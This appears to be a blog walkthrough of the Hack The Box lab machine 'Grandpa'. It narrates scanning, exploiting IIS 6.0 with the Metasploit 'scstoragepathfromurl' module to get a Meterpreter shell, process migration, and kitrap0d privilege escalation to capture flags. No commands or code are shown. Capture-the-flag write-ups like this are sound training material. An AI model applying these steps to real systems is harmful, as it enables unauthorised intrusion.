Greetings everyone!
We’re back with another Hack The Box walkthrough; this one is called Grandpa. So without further ado, let’s jump right into it!
The machine Grandpa has the IP 10.10.10.14, so let’s get started with an Nmap scan.
As we can see by the results returned, we don’t have a lot to go on. Port 80 is open and the web service running is Microsoft IIS httpd 6.0. Let’s browse to 10.10.10.14 to see if we can find anything useful!
Here we are greeted with the default “under construction” portal. I ran a couple of enumeration scripts for directory brute forcing, but nothing came up. So let’s fire up Metasploit and search for IIS!
After a bit of research and trial and error testing, the exploit we’ll be using is “scstoragepathfromurl” exploit:
We’ll need to set the target IP for the RHOSTS option, and choose the appropriate payload:
Once we have our settings in order, let’s run the exploit!
Meterpreter shell achieved! Now let’s try a very simple “getsystem” command to get full system access.
Well I guess that would have been too easy! So what we’re going to do is run the local exploit suggester, in order to see potential exploits we can use to get full system access. Before we do this, however, we’re going to migrate to another process that’s running as NT Authority. We can do this by first checking the processes by using the “ps” command.
As we can see, we successfully migrated to process 1816 which is running as NT Authority! Using the “getuid” command shows us that we are now NT Authority\Network Service. Awesome! Let’s run the exploit suggester now:
Well we may as well start with the first suggested exploit: kitrap0d! Let’s back out to our Metasploit terminal and use the exploit!
Uh oh. As we can see no session was created, even though the exploit was created. Let’s do a show options command to see if we can discover why we couldn’t get a session.
Ah ha! Our LHOST was set to the IP of our virtual machine! Setting it to the IP of our VPN connection and then running the exploit again gave us a new session!
Now that we’re in with escalated privileges, let’s start hunting for flags! The user flag was found under the account “Harry”:
And, in a surprising turn of events (not really), the root flag was found under the Administrator account:
And just like that, we were able to grab the two flags! I did experience a little bit of trouble on this machine, in the sense that my shell kept kicking me out back to the Meterpreter session. So I had to keep establishing a new shell and very quickly find the flags to upload to HTB. All in all, a pretty easy box but still very fun!
Thanks for reading!